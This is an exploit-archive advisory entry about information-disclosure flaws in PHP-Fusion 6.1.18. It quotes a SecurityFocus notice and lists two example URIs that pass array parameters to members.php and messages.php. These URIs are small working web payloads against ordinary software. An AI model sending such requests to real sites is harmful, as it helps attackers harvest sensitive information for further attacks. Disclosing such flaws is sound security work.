PHP-Fusion 6.1.18 - Multiple Information Disclosure Vulnerabilities



EKU-ID: 38053 CVE: OSVDB-ID:
Author: Inj3ct0r Published: 2009-08-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


source: https://www.securityfocus.com/bid/36171/info

PHP-Fusion is prone to multiple information-disclosure vulnerabilities.

Attackers can exploit these issues to harvest sensitive information that may lead to further attacks.

The following example URIs are available:

http://www.example.com/members.php?sortby[]=A
http://www.example.com/messages.php?folder[]=inbox